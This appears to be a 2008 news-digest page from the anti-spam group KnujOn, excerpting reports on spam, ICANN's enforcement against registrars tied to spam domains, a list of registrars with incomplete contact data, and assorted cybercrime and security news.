- hosted over 18,000 illicit domains, advertised in over 1.7 million unsolicited emails, and
- corrected exactly none of the 11,000 sites reported to ICANN by KnujOn
Even better, many of the illicit sites are fake pharmacies, and they are still active. And better than that, these sites were all registered by a handful of customers.
And, to add insult to injury, Xin Net is still registering 100 new illicit sites a day.
(weblog.infoworld.com)
June 17, 2008
Last Saturday, an arbitrator ordered Scott Richter, the president of online advertising and direct marketing firm Media Breakaway, to pay a stiff penalty to MySpace, including $1.2 million in legal fees.
The settlement is the second major one for Richter, who previously settled with Microsoft in August 2005 for $7 million. He was once considered one of the most prolific spammers, sending out over 100 million messages per day.
(betanews.com)
June 16, 2008
Spammers routinely register their sites under false names, or hijack someone else's identity to do so. But new research shows they're also paying for premium services when registering domain names to ensure a deeper level of anonymity...
Out of the 15,000 spam-advertised domains we examined, nearly half -- 7,142 names -- were registered through a Broomfield, Colo. company called Dynamic Dolphin. As I noted in my previous story, Dynamic Dolphin is the seventh most-popular registrar among spammers who provide patently false information in their public WHOIS records...
Dynamic Dolphin is owned by a company called CPA Empire, which in turn is owned by Media Breakaway LLC. The CEO of Media Breakaway is none other than Scott Richter, the once self-avowed "Spam King" who claims to have quit the business. Anti-spam groups also have recently implicated Media Breakaway in the alleged hijacking of more than 65,000 Internet addresses for use in sending e-mail and hosting commercial Web sites...
Dynamic Dolphin is a reseller of registrar services offered by an Indian company called Direct Information PVT Ltd. - also known as Directi and PublicDomainRegistry.com. Directi was the second most popular registrar among spammers who used privacyprotect.org; it handled the registration for nearly 4,000 of those 15,000+ domains that Knujon flagged...
(blog.washingtonpost.com)
June 14, 2008
SAN FRANCISCO — The onslaught of cellphone calls and e-mail and instant messages is fracturing attention spans and hurting productivity. It is a common complaint. But now the very companies that helped create the flood are trying to mop it up.(nytimes.com)
June 13, 2008
Senate Commerce Committee members Wednesday stressed the importance of striking the right balance with legislation to help fight secretly installed computer spyware and provide the FTC with the tools the agency needs to prosecute high-tech hackers.
(nextgov.com)
June 12, 2008
A new outbreak of SQL attacks began on the 8th. Not that they ever really go away, but new waves replace the old ones. The attackers are using a much larger number of domains than seen in previous months. Just 11 days into June, and already 54 of these domains have been observed. Many of these are previously suspended domains that registrars have released back to the attackers. The end result, some of the domains involved in the late May and early June attacks are now active again. Thus not only newly compromised sites are foisting the malware, but any sites previously compromised that have not cleaned up their pages (and properly parameterized their SQL queries) will now once again be serving as conveyor belts for password stealing trojans.(blog.scansafe.com)
June 11, 2008
ALBANY — - Online forums in which thousands of child-porn images have been posted have been stricken from three Internet providers, including two of the nation's five largest, New York Attorney General Andrew Cuomo said Tuesday.
(courant.com)
June 10, 2008
As part of our ongoing effort to ensure compliance and improve responsibility on the part
of Internet stakeholders KnujOn is posting the results of recent investigation of the
public disclosure of the locations of registrar companies. We have found 70 registrars listed on
the Internic registrar directory missing street addresses and/or phone numbers. More serious are
the following registrars that do not even have the country of location listed: EvoPlus Ltd.,
Hecta Media, Inc., Hostgator.com LLC, OnlineNIC, Inc., Thought Convergence, Inc., and Verelink, Inc.
This may merely be an oversight that can be corrected quickly, and I believe it should be. Full disclosure of this data will help transparency and trust. While registrants are required to disclose full contact data, the registrars should be held to the same standard.
This report was sent to ICANN and some of the data has already been corrected. The full list is below.
!!! BB Bulk, Inc. dba My Name Now
# 1 DotMobi Registrar, Inc.
10dencehispahard, S.L.
123 Registration, Inc.
8068 Registrar, Inc
A Mountain Domains, Inc.
A. W. B. Trading, Inc.
About Domain Dot Com Solutions Pvt. Ltd. d/b/a
Above, Inc.
Alibaba (China) Technology Co., Ltd.
Alisoft (Shanghai) Co., Ltd.
Anytime Sites, Inc.
AO Domains, Incorporated
Arctic Names, Inc.
Backslap Domains, Inc.
Best Bulk Register, Inc.
Black Ice Domains, Inc.
Blueweb, Inc.
Bottle Domains, Inc.
CodyCorp.com Inc.
Colorado Names Domains, Inc.
Commerce Island, Inc.
Cool Ocean, Inc.
Crisp Names, Inc.
Directi Internet Solutions Pvt. Ltd. d/b/a PublicDomainRegistry.com
DNGLOBE LLC
Domain Jingles, Inc.
DomainCannon.com LLC
Domerati, Inc.
Dootall, Inc.
Dotregistrar, LLC
Dotted Ventures, Inc.
Dynamic Dolphin, Inc.
ELB Group Inc
Emily Names Domains, Inc.
European NIC Inc.
EvoPlus Ltd.
Experian Services Corp.
FBS Inc.
Freeparking Domain Registrars, Inc.
Get SLD, Inc.
Good Luck Internet Services PVT, LTD.
Hecta Media, Inc.
Hostalia USA, Inc.
Hostgator.com LLC
Interdominios, Inc.
IPNIC, Inc
JJH Investments, LLC
Lazy Dog Domains, Inc
Naming Web, Inc.
NEEN.IT Inc., d/b/a namesprit.com
NetraCorp LLC dba Global Internet
NIC1, Inc
Oil Change Domains, Inc.
OnlineNIC, Inc.
Own Identity, Inc.
Pitchback Domains, Inc.
Pointag Technologies, Inc.
Slaphappy Domains, Inc.
Snowflake Domains, Inc.
Thought Convergence, Inc.
Threadagent.com, Inc.
Total Calories, Inc. dba Slim Names
united-domains AG
Valley Apples, Inc.
Verelink, Inc.
Walela Brook, Inc.
Western United Domains, Inc.
WGB Registry, Inc.
White Socks Domains, Inc.
June 9, 2008
Should they all be trusted at first sight by unsuspecting online users? Yes, unfortunately this is the case with the websites of renowned and respected IT security companies. However, now that are all vulnerable to cross-site scripting, the possibilities to get phished and infected with malware and crimeware are dramatically increased.
(xssed.com)
June 6, 2008
Who Will Rule The New Internet?(time.com)
While Josh Quittner asks a critical question in this Time article he focuses too much on the technology and misses
completely the various political power struggles going on in the background that are pulling and pushing on the Internet.
The issues of crime, safety, privacy, espionage and control are going boil up on the Internet in ways that Time
has not considered. In the end it may be the lawyers who control the Internet and not programmers.
June 5, 2008
LegitScript Internet pharmacy verification standards have been recognized by the National Association of Boards of Pharmacy (NABP).
LegitScript’s mission is to assist consumers and businesses in determining which Internet pharmacy websites operate safely and in compliance with Federal and state laws and regulations, as well as with accepted medical standards and ethics.
Over the next several months, LegitScript.com will be adding functionality to our website that will give consumers the ability to compare prices for specific prescription drugs from LegitScript-approved Internet pharmacies.
(legitscript.com)
June 4, 2008
SAN JOSE, Calif. -- When surfing the Internet for safe Web sites, not all domains are equal. Companies that assign addresses for Web sites appear to be cutting corners on security more when they assign names in certain domains than in others, according to a report to be released Wednesday by antivirus software vendor McAfee Inc.
McAfee found the most dangerous domains to navigate to are ".hk" (Hong Kong), ".cn" (China) and ".info" (information).
(washingtonpost.com)
June 3, 2008
ENISA (the European Network and Information Security Agency) presented a report estimating that spam cost Europe €27 billion in 2007, and represents a growing threat with the danger of a 'digital 9/11' on the horizon. The group called on the EU to improve efforts to combat the spam menace, including greater funding for anti-spam initiatives, a more unified approach to tackling spam, and the implementation of mandatory intrusion reporting systems.
Meanwhile the Internet Corporation for Assigned Names and Numbers (ICANN), the body responsibly for maintaining the structure of the internet, had also been raising their efforts to reduce spam. Following the publication of a report suggesting that the vast majority of spamvertised sites are hosted at domains administered by a small number of registrars, the ICANN group responded by contacting the named bodies and threatening to revoke their license to register domain names should they fail to take action to clean up their areas of the web. ICANN has a long-running system for registering complaints against specific domains, and claims to chase up over 75 issues per month with similar enforcement notices. ICANN's announcement, and the KnujOn organisation, who first drew attention to the clustering.
(virusbtn.com)
June 1, 2008
To track and investigate suspicious employment-related email offers.
To work with law enforcement to stop confirmed scams.
To provide help and resources to victims of employment scams.
To make the Internet a safer place.
(phishbucket.org)
May 30, 2008
ICANN sent a notice of breach to ICANN-accredited registrar Red Register, Inc. based on Red Register, Inc.'s failure to comply with the Uniform Domain Name Dispute Resolution Policy ("UDRP"). Specifically, Red Register failed to comply with UDRP Rule 16(a) and paragraph 4(k) of the UDRP despite repeated requests by ICANN and the National Arbitration Forum (“NAF”). These rules require registrars to communicate plans to implement UDRP Provider decisions and implement those decisions.
Consistent with the breach provisions of the Registrar Accreditation Agreement ("RAA"), ICANN requested that Red Register, Inc. act within 15 days to cure the cited breaches. If Red Register, Inc. fails to cure the breaches cited in ICANN’s notice of breach, ICANN will pursue all remedies available under the terms of the RAA, including termination.
The ICANN Board adopted the UDRP and UDRP Rules on 26 August 1999. In addition, ICANN approved the form of implementation documents on 24 October 1999. The RAA requires all accredited registrars to comply with board adopted Consensus policies.
As part of ICANN’s ongoing work to develop and maintain a tough, but fair, contractual compliance program designed to create an even playing field for registrars and registries, ICANN:
- Conducts registrar and registry audits to assess compliance with contractual terms;
- Conducts registrar and registry investigations after receiving information indicating that contract violations have occurred;
- Publishes a monthly newsletter to provide information regarding contractual compliance program activities at http://icann.org/compliance/newsletter/index.htm; and
- Assists thousands of consumers in resolving domain name-related complaints annually.
For more information about the Contractual Compliance Program mission and other details, please visit http://www.icann.org/compliance.
(icann.org)
Notice to Red Registrar Inc.
May 29, 2008
WASHINGTON, May 29 (UPI) -- The non-profit association that oversees Internet addresses is trying to crack down on shady Web pages used by spammers and hackers...
"It's a huge problem," said Burnette, declining to give more detailed figures on the numbers of registrants reported to have submitted inaccurate or incomplete information.
"If we find that registrars are not investigating reports (of inaccurate or non-existent WHOIS data) as they are required to, our escalation procedure can ultimately result in their accreditation being terminated," effectively shutting them down, she said.
(upi.com)
ICANN looks to lend a hand in spam fight (betanews.com)
May 28, 2008
In early May Representative Edward J. Markey (D-MA), chairman of the House Subcommittee on Telecommunications and the Internet, joined Reps. John D. Dingell (D-MI), chairman of the Energy and Commerce Committee, and 14 other members of the committee in sending a letter to Department of Commerce Secretary Carlos M. Gutierrez regarding possible changes to ICANN.
The letter was written over their concerns for a major change in the Department of Commerce's (DOC) relationship with ICANN.
(technewsreview.com.au)
ICANN slaps registrars who help criminals (avertlabs.com)
ICANN takes action against spam havens (gcn.com)
ICANN Puts eNom and Moniker “On Notice” (domainnamewire.com)
Top ten worst spam registrars notified by ICANN (blogs.zdnet.com)
May 27, 2008
In an effort to continue highlighting concerns at specific providers we will focus
on each company listed in
KnujOn top 10 of the worst spam-related registrars.
ICANN responded Friday to this list
which included Xin Net as #1.
Xin Net has been the focus of controversy and efforts at CastleCops recently
and is heavily connected to Fast Flux
operations as evidenced by this
analysis at the Università degli Studi di Milano. Xin Net accounts for 75% of the Fast Flux traffic.
The University of Milan Dipartimento di Informatica e Comunicazione
has found 10,570 malicious domains at Xin Net connected to Fast Flux. KnujOn's Xin Net illicit domain count
is fast approaching 30,000. Much of this traffic and spam
advertises "Canadian Pharmacy" type sites as seen below:
May 26, 2008
Mexico's northern border town of Juarez, infamous for its history of drug-related violence, has gone into lockdown after an e-mail began circulating warning of an unparalleled "bloodbath" in the coming days.
Shops, bars and restaurants have shut and soldiers are patrolling the streets, giving a surreal and dangerous tone to this city of 1.4 million people which sits just across the US border from the Texan town of El Paso.
Authorities are taking seriously the anonymous e-mail, which menaced "the bloodiest and most violent weekend in the history of Juarez."
The place is already reeling from a surge in murders that has claimed around 400 lives so far this year, several of them police officers and members of rival narcotics gangs.
The US embassy to Mexico has told US citizens that the message represented a "potential threat" and that public places, nightspots and the main streets in Juarez should all be avoided.
(breitbart.com)
May 25, 2008
BAGHDAD - He is everywhere but nowhere, an unseen geek whose skills as a software pirate are so impressive that others are now pirating his work.
more stories like this
Posters and pamphlets promoting his latest DVD, Anas08, hang in shop windows and flap in the breeze on vendors' tables wherever computer equipment is sold in Baghdad.
Looking for a new version of Adobe Photoshop, Microsoft Office, or an online edition of the Koran, complete with English translation and an index to topics and verses? They're all on the Anas08 disc, available for about $3, compared with the thousands of dollars it would cost to buy the 390 programs individually through authorized dealers.
This story reminded me of something. Like many folks I know people serving overseas and send them care packages. I asked
one serving in Iraq: "Do you want any DVD movies?" to which he responded: "No, we've got them all, they sell them on the street
for pennies and before they are even out in the U.S." Shocked but not surprised I asked him what else to they sell?
Everything. Office, Server2007, Dreamweaver. Pirated media and software is bountiful everywhere but it gave me pause
to think about soldiers loading them onto their laptops or watching movies on them in a war zone. What else is on those disks?
May 24, 2008
The Homeland Security Department’s Science and Technology Directorate has awarded a contract to Secure64 Software to increase the security of the Internet’s Domain Name Servers (DNS).
DNS is one of the most critical back-end processes on the Internet or any other IP network, but it operates somewhat transparently. DNS alleviates the burden of memorizing a Web site’s IP address, instead allowing the user to type in a simple domain name such as www.dhs.gov. The Internet would not be functional from a practical perspective without DNS.
But despite its importance, most DNS implementations are not secured, leaving DNS transactions vulnerable to attacks such as pharming, cache poisoning and DNS redirection. (usdoj.gov)
May 23, 2008
In order to clarify the system for dealing with incorrect “Whois” domain name registration information, and deal with community concern, ICANN is releasing the following information regarding its compliance work.
MARINA DEL REY, Calif.: ICANN has sent enforcement notices and notices of concern to certain registrars, including those reported this week as being the registrars for the majority of websites advertised in spam emails.
Earlier this week, an investigation by
KnujOn, widely reported online,
publicly identified 10 registrars
as being the companies used to register the majority of domain names that have since appeared in spam email messages.
More than half of those registrars named had already been contacted by ICANN prior to publication of KnujOn’s report, and the remainder have since been notified following an analysis of other sources of data, including ICANN’s internal database.
With tens of millions of domain names in existence, and tens of thousands changing hands each day, ICANN relies upon the wider Internet community to report and review what it believes to be inaccurate registration data for individual domains. To this end, a dedicated online system called the Whois Data Problem Report System (“WDPRS”) was developed in 2002 to receive and track such complaints.*
"ICANN sends, on average, over 75 enforcement notices per month following complaints from the community. We also conduct compliance audits to determine whether accredited registrars and registries are adhering to their contractual obligations," explained Stacy Burnette, Director of Compliance at ICANN.** "Infringing domain names are locked and websites removed every week through this system."
Although the majority of registrars offer excellent services and contribute to the highly competitive market for domains, ICANN’s compliance department has developed an escalation process to protect registrants and give registrars an opportunity to cure cited violations before ICANN commences the breach process.
However, while registrars are responsible for investigating claims of Whois inaccuracy, it is not fair to assume a registrar that sponsors spam-generating domain names is affiliated with the spam activity. A distinction must be made between registrars and an end user who chooses to use a particular domain name for illegitimate purposes.
"But if those registrars, including those publicly cited, do not investigate and correct alleged inaccuracies reported to ICANN, our escalation procedure can ultimately result in ICANN terminating their accreditation and preventing them from registering domain names," Ms Burnette said.
(icann.org)
May 22, 2008
BUCHAREST, ROMANIA – Thirty-eight individuals with ties to international organized crime have been charged in two separate indictments involving computer and credit card fraud schemes, Deputy Attorney General Mark R. Filip, Romanian Prosecutor General Laura Codruþa Kövesi, U.S. Attorney for the Central District of California Thomas P. O’Brien and Acting U.S. Attorney for the District of Connecticut Nora R. Dannehy announced today. The Deputy Attorney General made the announcement with the Romanian Prosecutor General to highlight the extensive and continued cooperation between the two countries in addressing these types of international crimes. The announcement comes less than one month after U.S. Attorney General Michael B. Mukasey announced the Department’s new Law Enforcement Strategy to Combat International Organized Crime.
(usdoj.gov)
May 21, 2008
BY COL. CHARLES W. WILLIAMSON III:
The world has abandoned a fortress mentality in the real world, and we need to move beyond it in cyberspace. America needs a network that can project power by building an af.mil robot network (botnet) that can direct such massive amounts of traffic to target computers that they can no longer communicate and become no more useful to our adversaries than hunks of metal and plastic. America needs the ability to carpet bomb in cyberspace to create the deterrent we lack.
(afji.com)
May 20, 2008
Knowing that a minority of companies control most of the sites advertised in spam helps put the junk email problem into better
perspective. To illustrate this consider a typical spam campaign. The emails are generated by tens of thousands of malware compromised
machines and networks on the Internet. They send millions of spam messages to millions of victims. Sounds like a big problem, right?
Not exactly. Because the number of actual websites advertised in those millions of messages is rather small in comparison
the derivative of a spam campaign is seriously reduced. Reducing the true size even further is the fact that these real websites
are held by one or maybe two registrar companies per campaign. Imagine that a spam campaign is a balloon. A balloon is
actually made of a very small amount of real material, it only appears bigger because it's full of hot air. The huge
volume of sent spam messages is the hot air that pushes the boundaries the Internet's resources, making the problem look bigger
than it is. However, the air only stays in the balloon because it is knotted at the bottom. The registrars are this knot.
Discuss the Spam Balloon
Spam domains use small number of registrars (heise-online.co.uk)
May 19, 2008
So who are the top 10 registrars most favored by spammers? You can see the list along with Knujon's
methodology here.
A few of the names on it are unsurprising simply by virtue of their market share. Number five -- Bellevue, Wash.,
based eNom -- is the second largest registrar, according to DomainTools's registrarstats.com.
Number six -- Pompano Beach, Fla., based Moniker -- has the eighth largest market share among registrars.
But size doesn't explain most of the names on the list. The registrars that scored the worst overall -
Xinnet Bei Gon Da Software, BEIJINGNN, and Todaynic -- are all located in China, and are 18th, 47th
and 99th in terms of market share, respectively.
Perhaps the most interesting name on the list is number 7 - a registrar out of Broomfield, Colo.,
called Dynamic Dolphin. According to Knujon, more than 10 percent of the company's 45,000-plus domains
have false WHOIS data, and more than 17 percent of the domains registered through the company have been
observed being advertised through spam.
A bit of digging into Dynamic Dolphin revealed that it is owned by a company called CPA Empire, which in
turn is owned by Media Breakaway LLC. Those of you who read
this post
a few weeks back will recognize
this company: Its CEO is Scott Richter,
a notorious, self-avowed spammer who claims to have quit the business.
As I noted in that post, anti-spam groups claim that Media Breakaway recently hijacked more than 65,000 IP
address for use in sending e-mail and hosting commercial Web sites.
(blog.washingtonpost.com/securityfix/)
May 18, 2008
GMER is an application that detects and removes rootkits. It scans for: hidden processes, hidden threads, hidden modules, hidden services, hidden files, hidden Alternate Data Streams, hidden registry keys, drivers hooking SSDT, drivers hooking IDT, drivers hooking IRP calls, inline hooks
(gmer.net)
May 17, 2008
RootkitRevealer is an advanced rootkit detection utility. It runs on Windows NT 4 and higher and its output lists Registry and file system API discrepancies that may indicate the presence of a user-mode or kernel-mode rootkit. RootkitRevealer successfully detects all persistent rootkits published at www.rootkit.com, including AFX, Vanquish and HackerDefender (note: RootkitRevealer is not intended to detect rootkits like Fu that don't attempt to hide their files or registry keys).
(technet.microsoft.com)
May 16, 2008
The Federal Trade Commission's just-approved new rule provisions for the
CAN-SPAM Act largely place the onus on e-mail marketers and their
affiliates to take responsibility for clean e-mail lists and clear
communication among marketing partners.
(dmnews.com)
May 15, 2008
AntiEvilTools Project is a non-governmental voluntary organizations of the Forum(www.antiprotect.com) with the purpose of the open-source security software category.
It is built on open-source enthusiasm of the participants on the basis of the study,You may see it as a study exchange the platform. In here , there are Kernel driver development experts, but also familiar algorithm programmer ,more full of learning enthusiasm of students at school.You only need the part which will participate in you by the demo form to submit n0bele@163.com .Once through the audit, you will see all AntiEvilTools source code.
(rootkit.com)
May 14, 2008
Three men have been indicted for hacking into a number of cash registers at Dave & Buster's restaurant locations nationwide to steal data from thousands of credit and debit cards, data that was later sold or used to cause more than $600,000 in losses, the Justice Department said this week.
(blog.washingtonpost.com/securityfix)
May 13, 2008
A recent report by security software maker Symantec reveals that spam accounted for an average of 80 percent of traffic hitting e-mail gateways in April, spiking as high as 87 percent at times. That is a daunting figure, but Garth Bruen of KnujOn looks at the problem in a different way.
According to a study being presented this week by KnujOn to the High Technology Crime Investigation Association, 90 percent of the illicit Web sites using spam to generate traffic are clustered on just 20 registrars — that is only 2.5 percent of the 800 registrars accredited by the Internet Corporation for Assigned Names and Numbers.
That can make the spam problem seem almost manageable.
(gcn.com)
Strategic Developer | Martin Heller: "20 registrars control 90% of illicit domains, says Knujon"
(weblog.infoworld.com)
May 12, 2008
Upload your file for testing here: virustotal.com
VirusTotal is a service that analyzes suspicious files and facilitates the quick detection of viruses, worms, trojans, and all kinds of malware detected by antivirus engines.
Specs: Free, independent service, Use of multiple antivirus engines, Real-time automatic updates of virus signatures, Detailed results from each antivirus engine, Real time global statistics
(virustotal.com)
May 11, 2008
90% of the illicit sites tracked by KnujOn.com are clustered at just 20 registrars which is only 2.5% of the entire registrar population. While networks of compromised spam generators, "bot-nets" are large and millions of spam emails are constantly sent, the number of final destination websites is considerably smaller, and the number of sponsors of those domains is even more concentrated.
(prweb.com)
This is just one of the issues we will be discussing at the
Ohio HTCIA Chapter
2008 Spring Training Conference
Monday May 12 at 3:30pm in H-1095 and Tuesday May 13 at 10:30 in H-1095 in the Clocktower building at
Lakeland Community College
(Full Schedule).
What is the HTCIA?
"The High Technology Crime Investigation Association (HTCIA) is designed to encourage,
promote, aid and effect the voluntary interchange of data, information, experience,
ideas and knowledge about methods, processes, and techniques relating to investigations
and security in advanced technologies among its membership." (htcia.org)
May 10, 2008
Cellphones have become consumers’ most personal technological devices. Some industry executives, along with consumer groups and security experts, are concerned that unwanted text messages on phones will be an even greater headache than unwanted computer messages.
Cellphone spam is particularly annoying to its recipients because it is more invasive — announcing itself with a beep — and can be costly.
(nytimes.com)
|%2020%20Registrars%20(90%)&chtt=Illict%20Sites%20by%20Registrar&chco=0000ff)
May 8, 2008
There are over 800 ICANN Accredited Registrars and thousands of ISPs. Most providers are playing by the rules. The ones that are not adhering to policy are wreaking the most havoc across the web. Some
of these providers merely have poor verification or auditing, others may be active partners to illicit activity and KnujOn is sorting out just which is which. What this means is that all the zombie-bot generated spam is intended to drive your attention to a very small subset of the Internet's infrastructure.
The problem looks bigger than it really is. In short, the fake pharmacies, knockoff product websites, pirate software stores,
phony lending institutions - the websites where the transactions occur - are generally under the control of a small number of companies.
Products sold on these sites have a sordid history and those behind
these operations have helped pushed illicit traffic profits into the hundreds of billions of dollars per year.
To clarify this relationship it is important to understand that the botnets are huge, the smaller population being referred to here are the actual
advertised landing sites. It gets confusing when everyone is talking about "sources" and various numbers. Let's take this as an example:
A botnet with 100,000 machines sends a 2 million message email blast (example, not real numbers). The spam massages actually only
reference 200 - 500 URI links. The URIs are often redirects that boil down to only 100 - 200 real domains, and 90% of these domains are
controlled by 2.5% of the registrar population. So, we've got lots of senders, lots of messages, but they are herding victims into a very small corral.
To be part of the solution, send your junk email to: knujon@coldrain.net.
May 7, 2008
There are many approaches to deal with forgotten passwords. All rely either on proving access to some resource (such as a pre-registered email account), or on
the long-term memory of the person who needs to restore access to his or her account. Most approaches are not very secure, and many are hard for legitimate
users to manage. To make it worse, many approaches are unsuitable for input-constrained devices, such as mobile phones.
It is well known in the cognitive science literature that personal preferences are more stable than long-term memory. A system based on personal preferences is
also less vulnerable to data-mining attacks than one that relies on more traditional facts (such as mother's maiden names or childhood address). We propose a
system that is secure and practical: It takes less than thirty seconds to authenticate (whether on a computer or a handheld), and has a false negative rate of close
to 0% and a false positive rate of less than 1%. For many environments, Blue Moon Authentication may very well be the best approach there is.
(ravenwhite.com)
May 6, 2008
MySpace has won a lawsuit against notorious spammer Sanford (Spamford) Wallace. The social networking website gained a default judgment against Wallace after he failed to turn over documents or appear in court, CNet reports. (theregister.co.uk)
May 5, 2008
Spam celebrates its 30th birthday on Saturday (3 May).
On that day in 1978, 393 Arpanet subscribers were sent what's reckoned to be the first ever spam email1 in history (the message itself was written on 1 May 1978).
DEC marketing rep Gary Thuerk came up with the wheeze which produced a fierce backlash from Arpanet (military) administrators, as well as a small number of sales.
After first appearing on Arpanet, unsolicited bulk commercial ads moved over to Usenet, email and websites links. Much to the chagrin of Hormel Foods, the term spam was applied to the phenomenon in a pop-culture reference to the spam skit from Monty Python's Flying Circus, where all meals in a restaurant come with spam, spam and more spam. Junk email - not nourishing luncheon meat - has become the principal meaning of the word spam.
(theregister.co.uk)
At 30, Spam Going Nowhere Soon - Audio (npr.org)
May 4, 2008
May 3, 2008
For companies like Microsoft, domain tasting creates the constant headache of chasing after typo-squatters — those who create and register Web sites with misspelled variations of the Microsoft name. For individual users, it means that millions of names are tied up in a constant churn of registering and returning names before fees are charged.
Now Icann — the Internet Corporation for Assigned Names and Numbers, the organization based in California that manages domain names — is considering steps to stamp out the practice.
The board of Icann will vote in Paris in June on a proposal to severely limit the number of domain names that can be returned without a fee, but the organization is facing resistance from domain name registrars, who are against ending the grace period.
These companies, which are licensed to register and sell new domain names, are themselves divided on the issue. Some argue that domain tasting is eroding consumer trust. Others insist that the grace period allows time to correct registrations that were spelled incorrectly.
(iht.com)
May 2, 2008
Some of the common tests used by Web sites to distinguish between legitimate flesh-and-blood visitors and malicious human-mimicking computers recently appear to have been outwitted.
Last month, the human verification tests, which typically require users to identify deformed letters set against a cluttered backdrop, were broken by a computer. The computer then repeatedly created free Hotmail e-mail accounts and sent spam from them, according to Websense, the security firm that detected the hacking.
(washingtonpost.com)
May 1, 2008
Many people are switching from Internet Explorer to alternative browsers such as Firefox and Safari. Though that might make them feel more secure, the shift has also opened new doors for bad guys.
...
So forget the idea that just because you've switched to a new browser, you're magically safer. You may be for a time, but to stay safe with any software, you need to keep current with fixes.
(washingtonpost.com)
April 30, 2008
There are dozens of video clips on the Web site YouTube showing teens getting high smoking or chewing salvia, a hallucinogenic herb related to sage and mint.
The clips show young people laughing, and claiming to see walls melting before their eyes. The drug is legal in all but six states.
According to the National Drug Intelligence Center, users typically experience vivid hallucinations, out-of-body experiences and feelings of merging with inanimate objects.
Salvia is not only legal, it is readily available.
(wtov9.com)
Hallucinogenic Herb Called Salvia Could Be the 'New Marijuana,' and Florida Lawmakers Might Ban It (foxnews.com)
Legal status of Salvia divinorum (wikipedia.org)
Salvia divinorum (wikipedia.org)
April 29, 2008
Some customers may think writing the terms on the panel on the back of the cards would deter fraud or forgery. But Visa's rules for merchants say that "In reality, criminals don't take the time to practice signatures: They use cards as quickly as possible after a theft and prior to the accounts being blocked. They are actually counting on you not to look at the back of the card and compare signatures - they may even have access to counterfeit identification with a signature in their own handwriting."
(boston.com)
April 28, 2008
According to FORTUNE magazine one of the world's
shrewdest and wealthiest investors has a bellow average credit rating. Why? Someone took out a loan in
his name at a Nevada HSBC bank and never paid it back. Famous victims of identity theft have
included Paul Allen, Steven Spielberg
George Lucas, Oprah Winfrey, Ross Perot, and Michael Bloomberg.
April 27, 2008
The Internet is slowly inching closer to ratcheting up the security of its Domain Name System (DNS) server architecture: The Internet Corporation for Assigned Names and Numbers (ICANN ) plans to go operational with the secure DNS technology, DNSSEC, later this year in one of its domains.
(darkreading.com)
April 26, 2008
High street chains will be the next victims of cyber terrorism, some of the world's elite hackers have warned.
They claim it is only a "matter of time" before the likes of Tesco and Marks & Spencer are targeted.
Criminals could use the kind of tactics which crippled Estonia's government and some firms last year, they warned.
(news.bbc.co.uk)
April 25, 2008
This story is disturbing. In what was described as a "common practice," White House staff and others attending a meeting with President Bush left their BlackBerrys sitting unattended on a table outside the meeting room. With the meeting in progress, a Mexican press attaché decided to lift six or seven of them and make a run for it. Thankfully, the Secret Service was able to catch him before he got too far. What I want to know is, what are government BlackBerrys doing sitting on an unprotected table?
(informationweek.com)
April 24, 2008
The use of cyberspace to target U.S. victims and infrastructure, jeopardizing the security of personal information, the stability of business and government infrastructures and the security and solvency of financial investment markets.
The manipulation of securities exchanges and engaging in sophisticated fraud schemes that rob U.S. investors, consumers and government agencies of billions of dollars.
(cnn.com)
April 23, 2008
OnGuardOnline.gov provides practical tips from the federal government and the technology industry to help you be on guard against Internet fraud, secure your computer, and protect your personal information.
(onguardonline.gov)
A partnership between the federal government and the technology industry
(APWG is a partner) to help consumers be on guard against Internet fraud, secure
their computers, and protect their personal information. The new videos also are
featured at
youtube.com/ftcvideos and on the FTC site at
ftc.gov.
April 22, 2008
The hackers that broke into Hannaford Brothers, a northeast U.S. grocery chain, may have spawned other attacks, including one at Okemo Resorts in Ludlow VT. As law enforcement and forensic experts continue to sift through the evidence of these attacks, the retailer and the ski resort remain mum on further developments.
(bankinfosecurity.com)
April 19, 2008
LONDON, England (CNN) -- If a vintage Ferrari for $30,000 sounds too good to be true, that's probably because it is.
But when a counterfeit classic is so good that even the experts are impressed, some buyers just can't resist the object of their desire at a knockdown price.
(cnn.com)
Video
April 17, 2008
Uncle Sam wants you—to help defend against Internet threats. But is the military any place for slackers and hackers? (businessweek.com)
April 16, 2008
SAN FRANCISCO — An e-mail scam aimed squarely at the nation’s top executives is raising new alarms about the ease with which people and companies can be deceived by online criminals.
(nytimes.com)
April 15, 2008
The US homeland security chief has made a heartfelt plea to Silicon Valley workers to stand up and be counted in the fight to secure the cyber highway.
Michael Chertoff invoked the attacks of 9/11 as he sought to galvanise IT professionals and security experts.
(news.bbc.co.uk)
April 14, 2008
In November 2006, the Federal Trade Commission held a huge conference on the challenges that American consumers would face in the next "Tech-Ade." The groan-inducing title aside, the event was a chance for the Commission staff to hear from assorted technology experts about the key issues that the FTC would have to police over the next ten years. Now, a year and a half after the conference, the Commission has finally written up (PDF) the "major trends identified at the hearings." They are old news by now (social networking is hot!), but the document does give us some insight into FTC priorities; hopefully, the Commission can deliver on its goals of ensuring consumer data privacy, monitoring behavioral advertising, and working globally to combat spam and spyware.
(arstechnica.com)
April 11, 2008
A new cybercrime book that KnujOn creator Garth Bruen helped edit and review is available. We highly recommend
Crimeware: Understanding New Attacks and Defenses, by Markus Jakobsson and Zulfikar Ramzan.
Available at
Amazon, Informit, oreilly
Crimeware: Understanding New Attacks and Defenses will help security professionals, technical managers, students, and researchers understand and prevent specific crimeware threats. This book guides you through the essential security principles, techniques, and countermeasures to keep you one step ahead of the criminals, regardless of evolving technology and tactics. Security experts Markus Jakobsson and Zulfikar Ramzan have brought together chapter contributors who are among the best and the brightest in the security industry. Together, they will help you understand how crimeware works, how to identify it, and how to prevent future attacks before your company’s valuable information falls into the wrong hands. In self-contained chapters that go into varying degrees of depth, the book provides a thorough overview of crimeware, including not only concepts prevalent in the wild, but also ideas that so far have only been seen inside the laboratory.
With this book, you will
- Understand current and emerging security threats including rootkits, bot networks, spyware, adware, and click fraud
- Recognize the interaction between various crimeware threats
- Gain awareness of the social, political, and legal implications of these threats
- Learn valuable countermeasures to stop crimeware in its tracks, now and in the future
- Acquire insight into future security trends and threats, and create an effective defense plan
With contributions by Gary McGraw, Andrew Tannenbaum, Dave Cole, Oliver Friedrichs, Peter Ferrie, and others.
April 10, 2008
(AP) Attorney General Michael Mukasey warned Friday that the huge profits
generated from piracy and counterfeiting are increasingly flowing into the
coffers of terrorist groups. In remarks to Silicon Valley executives at
the Tech Museum of Innovation, Mukasey said the economy and national
security of the United States are increasingly threatened by violations
involving copyrighted software code, patented inventions and trademarked
properties. Terror groups are taking their cues from organized crime and
increasingly funding their operations from counterfeiting and piracy, he
said. Mukasey said his department is devoting more resources to
